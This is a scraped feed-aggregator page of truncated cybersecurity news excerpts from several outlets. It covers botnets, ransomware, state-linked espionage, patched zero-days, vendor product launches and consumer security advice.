In light of active exploitation, users are recommended to apply the latest patches as soon as possible for optimal protection.

1 day, 3 hours ago @ thehackernews.com
Ngioweb Botnet Fuels NSOCKS Residential Proxy Network Exploiting IoT Devices

According to Trend Micro, the botnet comprises over 20,000 IoT devices as of October 2024, with Water Barghest using it to find and infiltrate vulnerable IoT devices using automated scripts and deploy the Ngioweb malware, registering them as a proxy.

The infected bots are then enlisted for sale on a residential proxy marketplace.

"The monetization process, from initial infection to the availability of the device as a proxy on a residential proxy marketplace, can take as little as 10 minutes, indicating a highly efficient and automated operation," researchers Feike Hacquebord and Fernando Mercês said.

The botnet employs a two-tiered architecture: The first being a loader network comprising 1…

1 day, 17 hours ago @ thehackernews.com
Hackers Hijack Unsecured Jupyter Notebooks to Stream Illegal Sports Broadcasts

Malicious actors are exploiting misconfigured JupyterLab and Jupyter Notebooks to conduct stream ripping and enable sports piracy using live streaming capture tools.

The attacks involve the hijack of unauthenticated Jupyter Notebooks to establish initial access, and perform a series of actions designed to facilitate illegal live streaming of sports events, Aqua said in a report shared with The Hacker News.

The covert piracy campaign within interactive environments widely used for data science applications was discovered by the cloud security firm following an attack against its honeypots.

"Next, the attacker executed FFmpeg to capture live streams of sports events and redirected them to the…

1 day, 17 hours ago @ thehackernews.com
Privileged Accounts, Hidden Threats: Why Privileged Access Security Must Be a Top Priority

In this blog, we explore why managing privileged access alone is insufficient and provide actionable insights to help you craft a security-first strategy for privileged access.

Why Managing Privileged Access Isn't Enough: As cyber threats grow more sophisticated, relying solely on PAM to secure privileged accounts is inadequate.

Real-Time Enforcement: The Future of Privileged Access Security: A security-first approach to privileged access extends beyond PAM's traditional limitations, focusing on proactive protection rather than reactive management.

Key Features of a Secure Privileged Access Strategy: To build a robust privileged access strategy, consider solutions that provide the following capab…

1 day, 20 hours ago @ thehackernews.com
New 'Helldown' Ransomware Variant Expands Attacks to VMware and Linux Systems

Cybersecurity researchers have shed light on a Linux variant of a relatively new ransomware strain called Helldown, suggesting that the threat actors are broadening their attack focus.

"Helldown deploys Windows ransomware derived from the LockBit 3.0 code," Sekoia said in a report shared with The Hacker News.

Helldown was first publicly documented by Halcyon in mid-August 2024, describing it as an "aggressive ransomware group" that infiltrates target networks by exploiting security vulnerabilities.

Like other ransomware crews, Helldown is known for leveraging data leak sites to pressure victims into paying ransoms by threatening to publish stolen data, a tactic known as double extortion.

"W…

1 day, 22 hours ago @ thehackernews.com
Chinese Hackers Exploit T-Mobile and Other U.S. Telecoms in Broader Espionage Campaign

U.S. telecoms giant T-Mobile has confirmed that it was also among the companies that were targeted by Chinese threat actors to gain access to valuable information.

The adversaries, tracked as Salt Typhoon, breached the company as part of a "monthslong campaign" designed to harvest cellphone communications of "high-value intelligence targets."

Salt Typhoon, which is also known as Earth Estries, FamousSparrow, GhostEmperor, and UNC2286, is said to have been active since at least 2020, according to Trend Micro.

The cybersecurity company said it observed two distinct attack chains employed by the group, indicating that the tradecraft Salt Typhoon has in its arsenal is as broad as it is varied.

By u…

2 days ago @ thehackernews.com
CISA Alert: Active Exploitation of VMware vCenter and Kemp LoadMaster Flaws

Now-patched security flaws impacting Progress Kemp LoadMaster and VMware vCenter Server have come under active exploitation in the wild, it has emerged.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added CVE-2024-1212 (CVSS score: 10.0), a maximum-severity security vulnerability in Progress Kemp LoadMaster to its Known Exploited Vulnerabilities (KEV) catalog.

"Progress Kemp LoadMaster contains an OS command injection vulnerability that allows an unauthenticated, remote attacker to access the system through the LoadMaster management interface, enabling arbitrary system command execution," the agency said.

CISA's addition of CVE-2024-1212 coincides with a warning…

2 days, 1 hour ago @ thehackernews.com
New Stealthy BabbleLoader Malware Spotted Delivering WhiteSnake and Meduza Stealers

Cybersecurity researchers have shed light on a new stealthy malware loader called BabbleLoader that has been observed in the wild delivering information stealer families such as WhiteSnake and Meduza.

This is evidenced in the steady stream of new loader families that have emerged in recent years.

"Each build of the loader will have unique strings, unique metadata, unique code, unique hashes, unique encryption, and a unique control flow," Robinson said.

The loader, at its core, is responsible for loading shellcode that then paves the way for decrypted code, a Donut loader, which, in turn, unpacks and executes the stealer malware.

The cybersecurity company said it "spotted new versions being …

2 days, 14 hours ago @ thehackernews.com
threatpost
last post None
DarkReading
last post None
WeLiveSecurity
last post 1 week, 5 days ago
Life on a crooked RedLine: Analyzing the infamous infostealer’s backend

To limit any possible confusion, we will use the following terms consistently throughout the text: RedLine malware: the RedLine Stealer malware or a sample thereof.

RedLine backend: the collection of modules that provide authentication and functionality for the RedLine panel.

This includes the RedLine malware, the RedLine panel, and the RedLine backend modules.

Builder tab of the RedLine panel. RedLine backend: The RedLine backend we analyzed in 2023 consists of two modules.

1 week, 5 days ago @ welivesecurity.com
ESET APT Activity Report Q2 2024–Q3 2024

ESET APT Activity Report Q2 2024–Q3 2024 summarizes notable activities of selected advanced persistent threat (APT) groups that were documented by ESET researchers from April 2024 until the end of September 2024.

Additionally, China-aligned APT groups have been relying increasingly on the open-source and multiplatform SoftEther VPN to maintain access to victims’ networks.

For the first time, we saw an APT group – specifically ScarCruft – abusing Zoho cloud services.

Malicious activities described in ESET APT Activity Report Q2 2024–Q3 2024 are detected by ESET products; shared intelligence is based mostly on proprietary ESET telemetry data and has been verified by ESET researchers.

Attack s…

1 week, 6 days ago @ welivesecurity.com
Jane Goodall: Reasons for hope | Starmus highlights

The trailblazing scientist shares her reasons for hope in the fight against climate change and how we can tackle seemingly impossible problems and keep going in the face of adversity. Renowned ethologist and conservationist Jane Goodall offers a sobering, but hopeful reflection on the precarious state of our planet.

With ecosystems worldwide facing unprecedented threats from climate change, biodiversity loss, intensive farming, deforestation, and pollution, Earth is undergoing what scientists call the sixth mass extinction.

Unlike in the past, however, this one is driven by human activity, accelerating species loss at rates much faster than typical evolutionary processes.

Yet, Ms. Goodall – w…

2 weeks ago @ welivesecurity.com
Month in security with Tony Anscombe – October 2024 edition

Each month, ESET's Chief Security Evangelist Tony Anscombe will bring you a roundup of the latest cybersecurity news and insights – all in five or so minutes.

Let's cut to the chase now and review some of the most impactful cybersecurity stories of October 2024.

Recent weeks have also seen a number of damaging hacks and breaches, including one hitting American Water, the largest US water utility, and two incidents targeting The Internet Archive.

Meanwhile, lawmakers have also been busy this month, as Australia introduced its first cybersecurity legislation.

In the US, the Cybersecurity and Infrastructure Security Agency (CISA) proposed new security requirements to protect personal and gover…

2 weeks, 6 days ago @ welivesecurity.com
How to remove your personal information from Google Search results

If not, consider requesting the removal of your personal information from search results.

What shows up in Google Search?

Unsurprisingly, the search results become more specific, showcasing how powerful search engines are at pinpointing someone’s data.

How to use Google’s “Results about you”To use this feature, you need to have a Google account.

For the browser version, follow these steps:

Log into your Google account and click on your profile avatar.

3 weeks ago @ welivesecurity.com
Don't become a statistic: Tips to help keep your personal data off the dark web

The dark web is thriving

First things first: Contrary to popular assumption, the dark web is not illegal and it’s not populated solely by cybercriminals.

Even worse, 700 of these emails had passwords associated with them stored in plain text and exposed on dark web sites.

There are various ways your own data could end up in a dark web forum or site.

If you’re signed up to an identity protection or dark web monitoring service, it should flag any PII or other data it finds on the dark web.

See what’s lurking out there on the dark web right now and it may never get to that stage.

3 weeks, 1 day ago @ welivesecurity.com
Tony Fadell: Innovating to save our planet | Starmus highlights

So what's the real story with methane and how exactly do the emissions of this powerful greenhouse gas accelerate climate change?

Increased awareness of methane’s potent warming effect and the urgency of reducing methane emissions have prompted a slew of methane-reducing initiatives.

To get a grip on the problem, however, the world first needs to identify emission sources with pinpoint accuracy.

This is where state-of-the-art satellite technology comes in.

In his talk, the legendary engineer and entrepreneur Tony Fadell talks about MethaneSAT, a pioneering satellite that orbits the planet in order to map and track the sources of methane emissions primarily from oil and gas operations, which…

3 weeks, 2 days ago @ welivesecurity.com
CloudScout: Evasive Panda scouting cloud services

The CloudScout toolset is capable of retrieving data from various cloud services by leveraging stolen web session cookies.

CloudScout utilizes stolen cookies, provided by MgBot plugins, to access and exfiltrate data stored at various cloud services.

In February 2023, CloudScout modules and the Nightdoor implant were detected at what we suspect is a Taiwanese government entity.

The CloudScout module obtains a new configuration by continuously monitoring its working directory, looking for files with .dat extensions.

This package is stored in the resources section of CloudScout modules and is loaded at the beginning of the ModuleStart function.

3 weeks, 2 days ago @ welivesecurity.com
ESET Research Podcast: CosmicBeetle

Then there are threat actors like CosmicBeetle – they lack the necessary skill set, write crude malware, yet still compromise interesting targets, and achieve “stealth” by using odd, impractical and overcomplicated techniques.

Discussing further with ESET Research Podcast host and Distinguished Researcher Aryeh Goretsky, Jakub shared his view of CosmicBeetle’s encryption routine, information about their victimology, and details of their “involvement” with high-profile gangs such as LockBit and RansomHub.

For details on how this crude and clumsy threat actor, whose malicious tools are “riddled with bugs”, managed to penetrate any of its targets, listen to this ESET Research Podcast episode…

3 weeks, 6 days ago @ welivesecurity.com
Embargo ransomware: Rock’n’Rust

ESET researchers have discovered new Rust-based tooling leading to the deployment of Embargo ransomware.

C:\Windows\Debug\a.cache: RC4-encrypted Embargo ransomware.

C:\Windows\Debug\pay.exe: Decrypted Embargo ransomware.

Tactic | ID | Name | Description
Resource Development | T1587.001 | Develop Capabilities: Malware | Embargo group develops its custom toolkit – MDeployer, MS4Killer, and Embargo ransomware.
Impact | T1486 | Data Encrypted for Impact | Embargo ransomware encrypts files on compromised machines.

4 weeks ago @ welivesecurity.com
Google Voice scams: What are they and how do I avoid them?

The classic Google Voice scam goes something like this:

Setting up a Google Voice account.

The fraudster downloads the Google Voice app and links it to a Google account, much like anyone else does.

Then they may do one of several things:
- Sell your Google Voice number and account to other scammers
- Place vishing calls designed to scam victims, using your Google Voice account
- Embed your Google Voice number into email phishing or smishing messages
- Use the Google Voice voicemail feature to record messages posing as legitimate authorities, in order to further their scams
- Use the Google Voice num…

1 month ago @ welivesecurity.com
Threat actors exploiting zero-days faster than ever – Week in security with Tony Anscombe

The rest of the software flaws under review were exploited as n-days; i.e., vulnerabilities first exploited after patches are made available (versus zero days, which are abused before patches are released).

The average time to exploit a software flaw has been shrinking considerably over the years – from 63 days in 2018-2019 all the way to only five days last year.

These and other figures in the report underscore a disconcerting trend: threat actors are rapidly getting better at spotting and weaponizing software vulnerabilities, which clearly poses an escalating threat to businesses and individuals alike.

What else did the report find and how does the market for zero-day exploits factor into…

1 month ago @ welivesecurity.com
Protecting children from grooming | Unlocked 403 cybersecurity podcast (ep. 7)

“Hey, wanna chat?” This innocent phrase can take on a sinister meaning when it comes from an adult to a child online and even be the start of a predatory relationship.

“Hey, wanna chat?” What sounds like a casual and innocent phrase between adults can take a sinister turn when it comes from an adult to a child online – and even be the start of a predatory relationship.

Grooming, where an adult uses psychological tactics to gain a child’s trust in order to manipulate, exploit, or abuse them, is a pervasive problem these days.

It often occurs online, where predators may use social media, gaming platforms, or messaging apps to contact minors.

In this episode of Unlocked 403, Becks sat down with ch…

1 month ago @ welivesecurity.com
Quishing attacks are targeting electric car owners: Here’s how to slam on the brakes

Although QR codes have been around since the 90s, quishing as a threat really started to appear during the pandemic.

Fraudsters leapt into action, sticking fake QR codes over the real ones.

There have been a number of reports about scammers targeting motorists via malicious QR codes stuck to parking meters.

If you’re uncomfortable scanning a QR code, consider using one of these alternatives to avoid the risk of interacting with a fraudulent code.

News of the latest QR quishing campaign will only increase calls for codes to be banned from public places.

1 month ago @ welivesecurity.com
Aspiring digital defender? Explore cybersecurity internships, scholarships and apprenticeships

In this blog, we’ll explore cybersecurity internships, scholarships and apprenticeships as three great pathways, especially for young people, to jump-start their careers in this exciting and rewarding field.

For example, ESET currently runs Women in Cybersecurity scholarships for female undergraduates looking to pursue a career in cybersecurity in the UK, US, Canada and Australia.

Some cybersecurity apprenticeships prepare you for industry certifications that validate the training and expertise learned, enhancing employability further down the line.

Job security: Almost all industries require cybersecurity, including health, government, education, law, financial services, and manufacturing…

1 month, 1 week ago @ welivesecurity.com
Naked Security
last post: none
Help Net Security
last post 1 hour ago
AxoSyslog: Open-source scalable security data processor

AxoSyslog is a syslog-ng fork, created and maintained by the original creator of syslog-ng, Balazs Scheidler, and his team.

We’ve also improved the monitoring and operational experience to help AxoSyslog better integrate with modern telemetry pipelines,” Balazs Scheidler, CEO of Axoflow, told Help Net Security.

Supporting OpenTelemetry data, including metrics and traces, has made it a versatile tool for observability in telemetry pipelines.

These come in handy when manipulating complex, deeply-nested data structures, like JSON, protocol buffers, or OpenTelemetry messages,” Scheidler added.

Future plans and download

“Our goal is to strengthen AxoSyslog as a generic purpose data and event proc…

1 hour ago @ helpnetsecurity.com
Product showcase: Augmenting penetration testing with Plainsea

Human-led penetration testing is an essential practice for any organization seeking to proactively address potential attack vectors.

Plainsea’s innovative all-in-one platform addresses these challenges through an augmented penetration testing approach that results in a continuous, streamlined, and collaborative service.

Plainsea’s dynamic infrastructure mapping provides security teams and MSSPs with a simplified yet comprehensive overview of their on-premises environment, ensuring no potential entry point is overlooked.

This way, Plainsea allows security teams to cut down paperwork by as much as six times and focus on more strategic tasks.

Clients and security teams can actively communicate, prioritize…

1 hour ago @ helpnetsecurity.com
CWE top 25 most dangerous software weaknesses

The CWE list of the 25 most dangerous software weaknesses demonstrates the currently most common and impactful software flaws.

The CWE top 25 most dangerous software weaknesses list was calculated by analyzing public vulnerability information in Common Vulnerabilities and Exposures (CVE) Records for CWE root cause mappings.

This year’s dataset included 31,770 CVE Records for vulnerabilities published between June 1, 2023 and June 1, 2024.

Data was pulled again on November 4, 2024, to ensure the most up-to-date CVE Records information was used in the top 25 list calculations.

CWE Top 25 for 2024

2 hours ago @ helpnetsecurity.com
Enhancing visibility for better security in multi-cloud and hybrid environments

According to the 2024 Thales Cloud Security Study, attacks targeting cloud management infrastructure saw a 72% rise in 2024.

However, by focusing on a few key strategies, SMBs can greatly enhance their cloud security posture without overwhelming their budgets.

Finally, investing in the right security tools is a foundational step for effective cloud security.

The number one challenge for infrastructure and cloud security teams is visibility into their overall risk, especially in complex environments like cloud, hybrid cloud, containers, and Kubernetes.

Be clear on your responsibilities in the cloud security model and ensure your provider offers visibility into their security posture.

2 hours ago @ helpnetsecurity.com
Preventing credential theft in the age of AI

In this Help Net Security video, Tina Srivastava, MIT Lecturer and CEO of Badge, discusses a 20-year cryptography problem – using biometrics for authentication without storing a face/finger/voice print.

This has massive implications for corporate and personal security/privacy because there is nothing for an attacker to steal.

3 hours ago @ helpnetsecurity.com
Full recovery from breaches takes longer than expected

In 2024, businesses reported taking an average of 7.3 months to recover from cybersecurity breaches – 25% longer than expected and over a month past the anticipated timeline of 5.9 months, according to Fastly.

Cybersecurity leaders feel unprepared for future threats

Recovery times were even worse for companies that planned on cutting back cybersecurity spending.

They faced an average of 68 incidents each – 70% above the average – and their recovery times stretched to 10.9 months, more than five months longer than those maintaining or increasing their budgets.

When it comes to software security, we found that organizations are also re-evaluating how security integrates across their operations…

3 hours ago @ helpnetsecurity.com
GitHub Secure Open Source Fund: Project maintainers, apply now!

GitHub is calling on maintainers of open source projects to apply for the newly opened Secure Open Source Fund, to get funding and knowledge to improve the security and sustainability of their software.

), venture funds (e.g., Mayfield Fund) and nonprofits (e.g., the Alfred P. Sloan Foundation).

“This program is suited for individual maintainers or small teams of open source projects.

Teams that can benefit from education and community to tackle security in a scaled manner are welcome to apply,” GitHub notes.

The first cohort of participants will include 125 maintainers / projects.

18 hours ago @ helpnetsecurity.com
Oracle Linux 9 Update 5 brings security updates, OpenJDK 17, .NET 9.0

Oracle Linux 9 Update 5 for the 64-bit Intel and AMD (x86_64) and 64-bit Arm (aarch64) platforms is now generally available.

An ism_o profile is introduced for Oracle Linux 9 systems to cover the “Information Security Manual” guidance produced by the Australian Cyber Security Centre.

Compilers and development tools

System Java updated to OpenJDK 17 – The default Oracle Linux 9 Java is changed from OpenJDK 11 to OpenJDK 17.

After this update, the java-17-openjdk packages, which provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit, also provide the java and java-devel packages.

.NET updated to version 9.0 – In this release, .NET is updated to version 9.…

18 hours ago @ helpnetsecurity.com
Quantum DXi9200 helps organizations manage and reduce cybersecurity risks

Quantum announces the DXi9200, the latest generation of its flagship DXi9000 Series hybrid (flash + dense disk) data protection appliances, designed for scalable, efficient backup and recovery services for large organizations.

As the industry’s most scalable, feature-rich, and efficient data protection appliance, the DXi9200 meets these challenges head on.

“The DXi9200 is a powerful new solution for strengthening any organization’s cyber resilience,” says Sanam Mittal, VP, DXi.

The DXi9200 strengthens every customer’s cyber resilience to protect against cyberattacks with a hardened architecture consistent with the NIST Cybersecurity Framework 2.0 (CSF 2.0) designed to help organizations to …

18 hours ago @ helpnetsecurity.com
Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308)

Apple has released emergency security updates for macOS Sequoia that fix two zero-day vulnerabilities (CVE-2024-44309, CVE-2024-44308) that “may have been actively exploited on Intel-based Mac systems”.

CVE-2024-44308 affects JavaScriptCore – the built-in JavaScript engine for WebKit – and can likewise be exploited via maliciously crafted web content.

As per usual, Apple didn’t share details about the attacks in which patched vulnerabilities are exploited.

Still, it’s safe to say that the spotted attacks aren’t indiscriminately targeting all Mac users, but are leveraging the flaws for targeted attacks.

In any case, all macOS Sequoia users should update their systems as soon as possible.

20 hours ago @ helpnetsecurity.com
ArmorCode unifies application security with infrastructure vulnerability management

ArmorCode announced the growth of its ASPM Platform with the ability to unify AppSec and infrastructure vulnerability management.

The ArmorCode Platform helps teams overcome these challenges by providing unified, comprehensive visibility, streamlining workflows, and by delivering faster, more efficient vulnerability management with AI-powered automation.

To further streamline vulnerability management, the ArmorCode Platform elevates infrastructure and cloud assets as first-class citizens within the RBVM process.

Key RBVM + ASPM differentiators include:

Unified vulnerability management: The only platform that truly integrates vulnerability management across infrastructure, cloud, containers, …

21 hours ago @ helpnetsecurity.com
Tanium Cloud Workloads provides visibility and protection for containerized environments

Tanium announced Tanium Cloud Workloads, providing real-time visibility and protection for containerized environments.

As the adoption of containerized workloads increases across organizations, so does the attack surface available to bad actors exploiting their vulnerabilities.

As part of the Tanium platform, Tanium Cloud Workloads reduces the risks associated with container deployments by identifying vulnerabilities and configuration issues in container images before they reach deployment.

Furthermore, container inventory and analysis capabilities included in Tanium Cloud Workloads provide visibility across clusters and nodes, enabling identification of rogue containers, which can pose sig…

22 hours ago @ helpnetsecurity.com
OpenText Cloud Editions 24.4 blends AI with secure data connectivity

OpenText unveiled Cloud Editions (CE) 24.4, presenting a suite of transformative advancements in Business Cloud, AI, and Technology to empower the future of AI-driven knowledge work.

“OpenText Cloud Editions 24.4 is purpose-built to empower today’s knowledge-driven workforce by blending AI with secure, seamless data connectivity,” said Muhi Majzoub, EVP and CPO at OpenText.

OpenText Business Cloud solutions empower everyone—from engineers to IT teams—with integrated, secure technology that drives significant simplification and efficiency.

OpenText Customer Data and OpenText Core Journey offer expanded unified customer data management capabilities, including preference management wit…

22 hours ago @ helpnetsecurity.com
Exabeam and Wiz join forces to improve cloud security

With its open architecture, the Exabeam New-Scale Security Operations Platform supports a best-of-breed ecosystem that includes hundreds of product integrations to accelerate time-to-value and strengthen on-premises and cloud security.

“By uniting cutting-edge cloud security intelligence from Wiz with AI-powered analytics from Exabeam, we are transforming how security teams defend against evolving threats.

With the Wiz integration, customers will experience enhanced cloud security insights and streamlined onboarding to the Exabeam New-Scale Platform.

By connecting Wiz’s cloud insights with data from other security tools, the Exabeam New-Scale Platform offers a unified view for investigatio…

22 hours ago @ helpnetsecurity.com
Arkose Device ID detects suspicious activity patterns

Arkose Labs launched Arkose Device ID, a device identification solution that raises the bar in fraud detection by combining precise device tracking with session-based risk signals and anti-spoofing technology.

Arkose Device ID is designed to address the growing sophistication of cyber threats, which are impacting businesses globally with increasing frequency and intensity.

“Arkose Device ID goes beyond traditional device fingerprinting,” said Vikas Shetty, head of product at Arkose Labs.

Arkose Device ID helps prevent fraud before it can escalate and provides a seamless experience for legitimate users.”

Arkose Device ID stands out with its unique combination of stateless and stateful identif…

22 hours ago @ helpnetsecurity.com
IT Security Guru
last post 2 months, 4 weeks ago
How Immigration Can Solve America’s Cybersecurity Shortage

The Growing Cybersecurity Skills Gap

The cybersecurity landscape is more complex and dangerous than ever before.

Immigration: A Solution to the Cybersecurity Shortage

Immigration can help solve the cybersecurity skills shortage in several ways.

Although immigration was highlighted as a crucial element in the policy to mitigate the cybersecurity talent shortage, meaningful immigration reform by Congress is essential for the successful implementation of this strategy.

These experts can help train the next generation of American cybersecurity professionals, ensuring that the U.S. remains at the forefront of global cybersecurity for decades to come.

Conclusion

The cybersecurity skills shortage is …

2 months, 4 weeks ago @ itsecurityguru.org
Cybereason Unveils SDR Data Ramp Program: Analyse and Detect Threats in 1TB of Log Data for 90 Days

Cybereason has launched its revolutionary SDR Data Ramp Programme with Observe.

This ensures that customers can experience the full capabilities of Cybereason’s SDR product, which is designed to detect, analyse, and respond to cyber threats with unparalleled accuracy and speed, reducing the need for legacy SIEM platforms.

“The 1TB Free SDR Data Ramp Programme underscores our commitment to empowering organisations with the tools they need to defend against increasingly sophisticated cyber threats.

This multi-layered approach enables security teams to identify and mitigate threats more effectively, reducing the time to detect and respond to incidents.

To learn more about Cybereason’s 1TB Free…

2 months, 4 weeks ago @ itsecurityguru.org
The 8 Most Common Website Design Mistakes According to Pros

Even seasoned professionals stumble upon common pitfalls that can impact user experience and, consequently, a site’s success.

With expertise from website design company, Full Stack Industries, we will explore common design mistakes and how to avoid them.

This inclusive step means all audiences can experience your site and will also improve your search engine rankings.

Final Thoughts

Keeping these common website design mistakes at bay can significantly elevate your online presence.

By prioritising user experience, accessibility, and clear communication, you’ll create a site that looks great and effectively serves its users.

3 months ago @ itsecurityguru.org
Dodging the Cyber Bullet: Early Signs of a Ransomware Attack

Encrypting a few devices to test their strategy is a red flag that a more significant ransomware assault is imminent and demands immediate action.

By staying alert to these signs and responding promptly, organisations can better defend against the escalating threat of ransomware attacks.

Poorly Managed Remote Desktop Protocol Connections

Remote Desktop Protocol (RDP) connections, if not properly managed, can be an entry point for ransomware attacks.

Sectors Prone to Ransomware Attacks

Specific sectors are particularly vulnerable to ransomware attacks thanks to the critical nature of their operations.

Here are the sectors most commonly targeted:

The healthcare sector is a prime target for ranso…

3 months ago @ itsecurityguru.org
Cyber insurance claims fall as businesses refuse ransom payments and recover themselves

Databarracks’ Data Health Check – an annual survey of 500 UK IT decision makers – found that while more organisations than ever have cyber insurance, the number of claims is down.

66% of those surveyed report having insurance specifically for cyber in 2024, rising from 51% over the past two years.

James Watts, Managing Director at Databarracks, commented: “We have long speculated about the negative effect of cyber insurance policies on ransomware.

The nascent cyber insurance market suddenly became unsustainable.

As our Data Health Check found last year, cyber insurance prices increased significantly and the requirements to obtain cover became stricter.

3 months ago @ itsecurityguru.org
AI-powered cyber threats are too overpowering for over 50% of security teams

According to research from Absolute Security, over half (54%) of Chief Information Security Officers (CISOs) feel their security team is unprepared for evolving AI-powered threats.

The findings were uncovered in the Absolute Security United Kingdom CISO Cyber Resilience Report 2024, which surveyed 250 UK CISOs at enterprise organisations to assess the state of cyber resilience, AI, and the cyber threat landscape in the UK.

Almost half (46%) of CISOs believe that AI is more of a threat to their organisation’s cyber resilience than a help, highlighting AI as a potential danger in safeguarding organisations from cyber threats rather than strengthening cyber resilience.

As AI-driven cyber threa…

3 months ago @ itsecurityguru.org
New Threat Report from Cato Networks Uncovers Threat Actor Selling Data and Source Code from Major Brands

The report found that threat actors are selling data and source code from major brands on the dark web.

Given the popularity of Amazon, users should be wary of threat actors creating counterfeit websites that ask to submit sensitive information.

Log4j remains a popular vulnerability that threat actors attempt to exploit

Three years after its discovery in 2021, Log4j remains one of the most used vulnerabilities leveraged by threat actors.

Inbound traffic is traffic that doesn’t originate from within the network, while WANbound traffic resides within a WAN environment.

“With the Q2 2024 Cato CTRL SASE Threat Report, we are putting the spotlight on a notorious threat actor named IntelBroker.

3 months, 1 week ago @ itsecurityguru.org
New Post Quantum Cryptography Standards Poised to Revolutionize Cybersecurity

The National Institute of Standards and Technology (NIST) has officially published its highly anticipated Federal Information Processing Standards (FIPS) for post-quantum cryptography (PQC).

The algorithms announced today represent the first finalized standards from NIST’s PQC standardization project and are now ready for immediate implementation.

Today’s announcement takes place within a larger regulatory framework, including the White House’s National Security Memorandum, NSM-8, which requires the adoption of post-quantum cryptography (PQC).

Today’s quantum computers are small and experimental, but they are rapidly becoming more capable, and it is only a matter of time before cryptographi…

3 months, 1 week ago @ itsecurityguru.org
Kicking cyber security down the road can come back to bite you

Yet despite the clear and present danger, some businesses continue to deprioritise cyber security, with a concerning 15% failing to invest in cyber security measures.

An overshadowed priority

Despite a shared understanding of cyber threats among security leaders and C-suite, cyber security often gets overlooked.

Alarmingly, a third of security leaders only prioritise cyber security expertise after an attack has happened.

Securing buy-in

To ensure cyber security is prioritised, it is vital to convey to the C-suite the very real implications of not mitigating cyber security risks.

It is time to implement cyber security measures now

By deprioritising cyber security, businesses are essentially def…

3 months, 1 week ago @ itsecurityguru.org
What skills can cyber security experts develop to adapt to AI and quantum computing?

High levels of demand for cyber security expertise also mean that it’s one of the best paying roles in tech with a great level of job security.

However, cyber security professionals are in a never-ending arms race with hackers.

On the other side, AI also has the capacity to create an arsenal of new offensive and defensive tools for cyber security experts.

Quantum computing: Like AI, quantum computing has the capacity to utterly transform how we all live and work.

Ambitious cyber security professionals could become trailblazers in this sector if they start acquiring relevant skills now.

3 months, 1 week ago @ itsecurityguru.org
HealthEquity Data Breach Compromises Customer Information

HealthEquity, a leading provider of health savings account (HSA) services, has announced it suffered a data breach recently, resulting in compromised customer protected health information (PHI). It is understood the breach was detected on March 25, 2024, after abnormal activity was flagged from a business partner’s device. Once an investigation was carried out, it was […]

The post HealthEquity Data Breach Compromises Customer Information first appeared on IT Security Guru.


3 months, 3 weeks ago @ itsecurityguru.org
Accenture and SandboxAQ Expand Cybersecurity Partnership

Today, Accenture (NYSE: ACN) and SandboxAQ have announced that they are expanding their partnership to address the critical need for enterprise data encryption that can defend against current data breaches, as well as future AI and quantum threats. Together, Accenture and SandboxAQ are helping organisations secure sensitive data and strengthen encryption across their technology portfolios. […]


3 months, 3 weeks ago @ itsecurityguru.org
People Overconfident in Password Habits, Overwhelmed by Too Many Passwords

New research by Keeper Security has revealed some worrying trends and misunderstandings when it comes to password best practices and overconfidence in cyber knowledge. The research found that, while 85% of respondents believe their passwords are secure, over half admit to sharing their passwords. Additionally, 64% of people feel confident in their cybersecurity knowledge despite […]


3 months, 3 weeks ago @ itsecurityguru.org
Secure, Simple, Superior: The Advantages of Tokenized Payment Cards by Wallester

Technology is advancing rapidly and tokenized payment cards are a part of its evolution. Gone are the days of keying in long card numbers, expiry dates and CVV codes and hoping for the best. Instead, tokenized cards offer heightened security and improved transaction processes for digital payments. But what are they all about and how […]


3 months, 3 weeks ago @ itsecurityguru.org
Security Flaws Found in Hotjar, Potentially Affecting Sensitive Data of Millions Utilising Major Global Brands

Salt Labs, the research arm of API security company Salt Security, has released new research highlighting critical security flaws in the popular web analytics provider Hotjar. The company serves over one million websites, including global brands like Microsoft and Nintendo (according to its website). These vulnerabilities could have potentially allowed an attacker unlimited […]


3 months, 3 weeks ago @ itsecurityguru.org
SecurityTrails
last post: none
Blogs 👨‍💻
Бизнес без опасности
last post: none
Жизнь 80 на 20
last post: none
ZLONOV
last post: none
Блог Артема Агеева
last post: none
Киберпиздец
last post: none
Schneier on Security
last post 15 hours ago
Steve Bellovin’s Retirement Talk

About Bruce Schneier: I am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

15 hours ago @ schneier.com
Why Italy Sells So Much Spyware

Interesting analysis: Although much attention is given to sophisticated, zero-click spyware developed by companies like Israel’s NSO Group, the Italian spyware marketplace has been able to operate relatively under the radar by specializing in cheaper tools.

According to an Italian Ministry of Justice document, as of December 2022 law enforcement in the country could rent spyware for €150 a day, regardless of which vendor they used, and without the large acquisition costs which would normally be prohibitive.

As a result, thousands of spyware operations have been carried out by Italian authorities in recent years, according to a report from Riccardo Coluccini, a respected Italian journalist wh…

1 day, 19 hours ago @ schneier.com
Most of 2023’s Top Exploited Vulnerabilities Were Zero-Days

Zero-day vulnerabilities are more commonly used, according to the Five Eyes. Key findings: In 2023, malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks compared to 2022, allowing them to conduct cyber operations against higher-priority targets.

In 2023, the majority of the most frequently exploited vulnerabilities were initially exploited as a zero-day, which is an increase from 2022, when less than half of the top exploited vulnerabilities were exploited as a zero-day.

Malicious cyber actors continue to have the most success exploiting vulnerabilities within two years after public disclosure of the vulnerability.

The utility of these vulnerabilitie…

2 days, 15 hours ago @ schneier.com
Friday Squid Blogging: Female Gonatus Onyx Squid Carrying Her Eggs


5 days, 9 hours ago @ schneier.com
Good Essay on the History of Bad Password Policies

Their work was a big step forward, if not for two mistakes that would impede future progress in improving passwords for decades.

First was Morris and Thompson’s confidence that their solution, a password policy, would fix the underlying problem of weak passwords.

The user is warned of the risks and if he cooperates, he is very safe indeed.

Morris and Thompson assumed their intervention would be effective without testing its efficacy, considering its unintended consequences, or even defining a metric of success to test against.

Not only did their hunch turn out to be wrong, but their second mistake prevented anyone from proving them wrong.

5 days, 19 hours ago @ schneier.com
New iOS Security Feature Makes It Harder for Police to Unlock Seized Phones

Everybody is reporting on a new iPhone security feature in iOS 18: if the phone hasn’t been used for a few days, it automatically goes into its “Before First Unlock” state and has to be rebooted.

This is a really good security feature.

But various police departments don’t like it, because it makes it harder for them to unlock suspects’ phones.

